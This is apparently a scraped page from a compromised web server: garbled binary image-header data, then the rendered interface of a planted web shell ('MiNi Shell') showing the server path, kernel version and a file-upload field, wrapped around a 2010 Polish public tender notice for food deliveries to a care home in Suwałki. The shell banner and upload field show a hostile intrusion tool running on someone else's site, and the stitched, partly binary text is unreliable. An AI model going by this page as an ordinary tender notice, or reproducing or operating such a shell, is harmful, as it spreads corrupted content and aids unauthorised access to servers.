JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100923/303302-N-2010.html

<p class="kh_header"><b>Suwałki: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 303302 - 2010; data zamieszczenia: 23.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Kalina" w Suwałkach , ul. gen. Kazimierza Pułaskiego 66, 16-400 Suwałki, woj. podlaskie, tel. 0-87 5628500, faks 0-87 5628507.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpskalina.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dokonywana przez Wykonawcę dwa razy w tygodniu do godz. 10.00 - Załącznik nr 1 do SIWZ. Artykuły spożywcze będą dostarczane w ilości zgodnej z zamówieniami częściowymi składanymi przez osoby upoważnione, telefonicznie bądź pisemnie najpóźniej do godz. 1500 dnia poprzedzającego dostawę wg cen określonych w formularzu cenowym stanowiącym Załącznik nr 4 do oferty.
Całość zamówienia składa się z sześciu części. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia. Każdy Wykonawca zobowiązany jest wypełnić formularz cenowy w części lub w całości i dołączyć do oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Projekt umowy Załącznik nr 2 do SIWZ, wypełniony i podpisany,  przez osobę(y) upoważnioną(e) do składania oświadczeń woli w imieniu Wykonawcy.
2) Formularz ofertowy wypełniony i podpisany, przez osobę(y)  upoważnioną(e) do składania oświadczeń woli w imieniu Wykonawcy - Załącznik nr 3 do SIWZ.
3) Formularz   cenowy   wg   załączonego   wzoru   Załącznik     nr   4   do  SIWZ,   wypełniony  i podpisany,  przez osobę(y)  upoważnioną(e) do składania oświadczeń woli w imieniu Wykonawcy.
4) W przypadku gdy Wykonawcę reprezentuje pełnomocnik(nicy) (można wystawić jednorazowe pełnomocnictwo do danego konkretnego postępowania), do oferty musi być załączone pełnomocnictwo (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika z dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby reprezentujące osobę prawną  lub fizyczną. 	
W przypadku  złożenia   kserokopii pełnomocnictwo   musi być potwierdzone   za zgodność z  oryginałem przez udzielającego lub przyjmującego pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zamawiający zastrzega możliwość zwiększania lub zmniejszania ilości zamawianego towaru w przypadku zwiększenia lub zmniejszenia mieszkańców Domu, w przypadku zmiany ilości zalecanych diet oraz zmiany jadłospisu dziennego lub miesięcznego. Zmiana ilości nie powoduje zmiany cen jednostkowych danego asortymentu.  
2) Cena dostarczanego towaru może ulec zmianie o wysokość wskaźnika wzrostu cen towarów i usług konsumpcyjnych ogłaszanych przez Prezesa GUS w Monitorze Polskim po upływie 7 dni od dnia otrzymania i podpisania przez obydwie strony aneksu do umowy. Pierwsza zmiana ceny w przypadku zaistnienia przesłanek dla jej zmiany zgodnie z ust. 2, może nastąpić nie wcześniej niż po upływie 3 miesięcy od dnia podpisania niniejszej umowy, następne zaś nie częściej niż jeden raz na 3 miesiące. Wykonawca zapewnia, że w przypadku obniżki na lokalnym rynku ceny towaru będącego przedmiotem niniejszej umowy, dostosuje swoje ceny do cen aktualnie obowiązujących, które nie będą wyższe od cen hurtowych.
3)Cena może ulec zmianie przy zmianie stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpskalina.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej KALINA, ul. Pułaskiego 66, 16-400 Suwałki, pok. Nr. 10 Dział Gospodarczy i Obsługi..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2010 godzina 09:00, miejsce: Dom Pomocy Społecznej KALINA, ul. Pułaskiego 66, 16-400 Suwałki, pok. Nr. 3 Kadry..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 20 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty sypkie, wafle itp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa i gramatura artykułu 	Ilość jednostek w kg
1.Makaron (nitki, świderki wstążka, muszelki) 1 kg - 5 kg	1200 kg
2.Makaron spaghetti 500 g - 1 kg	200 kg
3.Makaron łazankowy 1 kg	20 kg
4.Ryż 1 kg	400 kg
5.Kasza jęczmienna (gruba, drobna, średnia) 500 g - 1 kg	250 kg
6.Kasza manna 500 g - 1 kg	250 kg
7.Mąka tortowa 1 kg	400 kg
8.Mąka pszenna 1 kg	460 kg
9.Mąka ziemniaczana 1 kg	100 kg
10.Płatki jęczmienne 500 g	220 kg
11.Płatki owsiane 500 g	250 kg
12.Płatki ryżowe 500 g	270 kg
13.Wafle ryżowe 100 g	10 kg
14.Wafle tortowe 100 g - 200 g	15 kg
15.Bułka tarta 400 g - 1 kg	100 kg
16.Cukier kryształ 1 kg	3000 kg
17.Cukier puder 400 g - 500 g	10 kg
18.Sól kamienna jodowana 1 kg	600 kg
19.Herbata granulowana 100 g - 500 g	146 kg
20.Herbata liściasta 40 g - 100 g	2 kg
21.Herbata ekspresowa 500 g - 1 kg	2 kg
22.Kawa Inka lub równoważna           100 g - 250 g	40 kg
23.Kawa zbożowa 500 g - 1 kg	25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Tłuszcze, jaja oraz przyprawy i dodatki do potraw, deserów, ciast itp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa i gramatura artykułu 	Ilość jednostek w kg/ l
1.Olej 900 ml - 3 l	1100 l
2.Masło roślinne w plastikowym pojemniku 250 g - 500 g	2500 kg
3.Margaryna 200 g - 500 g	10 kg
4.Jaja świeże - klasa jakości A, B	33000 szt
5.Majonez 300 g - 1 kg	100 kg
6.Kostki rosołowe100 g - 150 g	40 kg
7.Przyprawy (np. Warzywko, Kucharek, Jarzynka lub równoważne) 75 g - 1 kg	100 kg
8.Przyprawa do mięs, drobiu, ryb Delikat lub równoważna 75 g - 1 kg	30 kg
9.Sosy do mięs (co najmniej 5 rodzajów) 30 g - 100 g	50 kg
10.Barszcz czerwony w słoiczku 150 g	20 kg
11.Maggi 150 ml - 1 l	30 l
12.Ocet 500 ml - 1 l	60 l
13.Zupy w proszku (co najmniej 5 rodzajów) 100 g  	100 kg
14.Majeranek 5 g - 20 g	3 kg
15.Pieprz naturalny mielony 10 g - 30 g	3 kg
16.Pieprz ziołowy 10 g - 30 g	10 kg
17.Pieprz naturalny ziarnisty 10 g - 30 g	3 kg
18.Ziele angielskie 10 g - 30 g	5 kg
19.Susz warzywny 100 g - 500 g	30 kg
20.Grzyby suszone 250 g - 1 kg	1 kg
21.Liść laurowy 10 g - 30 g	5 kg
22.Sosy do sałatek 10 g - 100 g	10 kg
23.Budynie (co najmniej 3 rodzaje)    40 g - 100 g	40 kg
24.Cukier waniliowy 10g - 20 g	5 kg
25.Galaretki owocowe (co najmniej 3 rodzaje) 100 g 	50 kg
26.Aromaty do ciast (co najmniej 3 rodzaje) ok. 10 ml	1 l
27.Kakao naturalne 100 g - 300 g	5 kg
28.Kakao rozpuszczalne 100g - 500g	5 kg
29.Kisiel ( co najmniej 3 rodzaje)       40 g - 100 g	40 kg
30.Mak niebieski 300 g - 500 g	5 kg
31.Kwasek cytrynowy 40 g - 100 g	3 kg
32.Soda oczyszczona 40 g - 100 g	1 kg
33.Proszek do pieczenia 10 g - 20 g	4 kg
34.Drożdże świeże 100 g - 1kg	10 kg
35.Żelatyna 20 g - 100 g	20 kg
36.Cynamon 7 g - 100 g	3 kg
37.Śliwki wędzone/suszone 100 g - 1 kg	3 kg
38.Rodzynki 100 g - 1 kg	1 kg
39.Wiórki kokosowe 100 g - 1 kg	2 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.22.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przetwory warzywne, mrozonki itp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa i gramatura artykułu 	Ilość jednostek w kg/l /szt
1.Chrzan tarty 100 g - 400 g 	80 kg
2.Ćwikła z chrzanem 100 g - 500 g	90 kg
3.Kukurydza 200 g - 400 g	250 kg
4.Groszek konserwowy 200 g - 400 g	250 kg
5.Ketchup 200 g - 1 kg	150 kg
6.Koncentrat pomidorowy                  100 g - 1 kg	400 kg
7.Papryka konserwowa 500 g - 1 kg	200 kg
8.Sałatka wielowarzywna (słoik)500 g - 1 kg	300 kg
9.Sałatka trójskładnikowa (słoik) -groszek, marchewka, kukurydza-500 g - 1 kg	100 kg
10.Sałatka babuni (słoik)500 g - 1 kg	140 kg
11.Sałatka szwedzka (słoik)500 g - 1 kg	200 kg
12.Przecier ogórkowy 200 g - 400 g	40 kg
13.Szczaw przecier 200 g - 400 g	40 kg
14.Ogórki konserwowe 500 g - 5 kg	50 kg
15.Musztarda 100 g - 500 g	100 kg
16.Sałatka wielowarzywna z papryką (słoik) 500 g - 1 kg	40 kg
17.Mrożonki warzywne 7 składnikowe 450 g - 1 kg    	100 kg
18.Marchewka z groszkiem mrożona 450 g - 1 kg	100 kg
19.Kalafior mrożony 450 g - 1 kg	80 kg
20.Warzywa na patelnię (mrożone) 450 g- 1kg	100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.11.70-9, 15.33.14.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przetwory owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa i gramatura artykułu 	Ilość jednostek w l
1.Dżemy (co najmniej pięć rodzajów/smaków) 200 g - 400 g	330 kg
2.Marmolada owocowa 500 g - 10 kg	500 kg
3.Miód pszczeli 150 g - 400 g	20 kg
4.Miód pszczeli sztuczny                   150 g - 400 g	30 kg
5.Kompoty (co najmniej 3 rodzaje/smaki) 900 ml - 1,5 l	750 l
6.Syropy owocowe (co najmniej 3 rodzaje/smaki) 300 ml - 1,5 l	1250 l
7.Ananas w puszce 350 g - 700 g	10 kg 
8.Brzoskwinia w puszce 350 g - 850 g	10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Soki, napoje, woda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa i gramatura artykułu 	Ilość jednostek w l
1.Sok pomarańczowy 1 l - 2 l	200 l
2.Sok z czarnej porzeczki 1 l - 2 l	150 l
3.Sok jabłkowy 1 l - 2 l	150 l
4.Sok grejpfrutowy  1 l - 2 l	150 l
5.Sok winogronowy	50 l
6.Napoje gazowane (co najmniej trzy rodzaje/smaki) 500 ml - 2,5 l	500 l
7.Napoje niegazowane (co najmniej trzy rodzaje/smaki) 500 ml - 2,5 l	500 l
8.Woda mineralna gazowana 500 ml - 2,5 l	1500 l
9.Woda mineralna niegazowana     500 ml - 2,5 l	1700 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.32.00.00-7, 41.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Słodycze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa i gramatura artykułu 	Ilość jednostek w kg
1.Ciastka domowe 50 g - 1 kg	40 kg
2.Biszkopty 50 g - 250 g	30 kg
3.Chrupki kukurydziane 30 g - 50 g	15 kg
4.Herbatniki zwykłe 40g - 100g	30 kg
5.Cukierki czekoladowe - mieszanka Wedlowska lub równoważne 500 g - 1 kg	20 kg
6.Pierniki alpejskie lub równoważne  500 g - 1 kg	45 kg
7.Ciastka delicje 300 g - 1 kg	58,50 kg
8.Czekolady mleczne 100 g	39 kg
9.Baton czekoladowy typu Milky Way 35 g - 50 g lub równoważny	40 kg
10.Cukierki czekoladowe typu Michałki lub równoważne 100 g - 500 g	50 kg
11.Krakersy 100 g - 200 g	20 kg
12.Lizaki ok. 10 g	20 kg
13.Kakao rozpuszczalne typu Nesquik 400 g lub równoważne 	65 szt
14.Baton typu Kinder Bueno 43 g lub równoważny 	65 szt
15.Baton typu Lion 43 g lub równoważny	65 szt
16.Baton typu Aero 35 g lub równoważny 	65 szt
17.Baton Kit Kat 42 g lub równoważny	65 szt
18.Baton Nestle 25 g lub równoważny	65 szt
19.Baton Snickers 57 g lub równoważny	65 szt
20.Baton Mars 53 g lub równoważny	65 szt
21.Cukierki Schoko - Bons 125 g lub równoważne	65 szt
22.Czekoladki Merci 250 g lub równoważne	65 szt
23.Ptasie mleczko Wedel 420 g lub równoważne	65 szt
24.Żelki Haribo 100 g lub równoważne	65 szt
25.Ciastka czekoladowe Hit 250 g lub równoważne	65 szt
26.Ciastka z bakaliami Jeżyki 140 g lub równoważne	65 szt
27.Cukierki Nimm2 90 g lub równoważne	65 szt
28.Czekolada Bąbolada 80 g lub równoważna	65 szt
29.Kinder czekolada 100 g lub równoważna	65 szt
30.Drażetki Skittles 45 g lub równoważne	65 szt
31.Drażetki Mentos 38 g lub równoważne	65 szt
32.Drażetki M&Ms 48g lub równoważne 	65 szt
33.Krem orzechowo - czekoladowy Nutella 350 g lub równoważny	65 szt
34.Rogal nadziewany 7 Days, Chipicao 65 g lub równoważny 	65 szt
35.Lizak owocowy Chupa Chups 12 g lub równoważny	65 szt
36.Orzeszki ziemne w puszce 150 g	65 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com